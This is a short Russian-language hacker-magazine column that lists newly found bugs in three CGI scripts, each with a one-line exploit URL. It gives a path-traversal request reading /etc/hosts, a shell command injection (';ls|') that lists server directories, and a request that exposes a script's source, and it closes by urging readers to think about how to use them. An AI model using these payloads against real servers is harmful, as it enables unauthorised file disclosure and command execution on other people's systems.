Хакер #311. Сетевые протоколы под микроскопом
Привет. Соскучились? Ну вот мой свежий обзор новых cgi багов. Что
меня больше всего удивляет, так это то, что не смотря на общеизвестные методы взлома cgi скриптов, программеры продолжают писать проги к которым эти методы применимы...
Название: parsetemplate.cgi
Уязвимость: Скрипт позволяет просматривать
некоторые файлы на диске жертвы.
Эксплоит: parsetemplate.cgi?template=/../etc/hosts
Название: at_birta.cgi
Уязвимость: C помощью этого скрипта ты сможешь просматривать
содержание директорий на сервере
Эксплоит: at_birta.cgi?&template=;ls|
Следующая уязвимость в скрипте не даст вам возможности смотреть файлы или директории на сайтах, но вы сможете получить
исходный код скрипта и тем самым узнать значения
некоторых интересующих вас переменных.
Название: www_protect.pl
Эксплоит: www_protect.pl?file=/
На сегодня все.Чеши свой волосатый животик и думай как этим
воспользоваться.
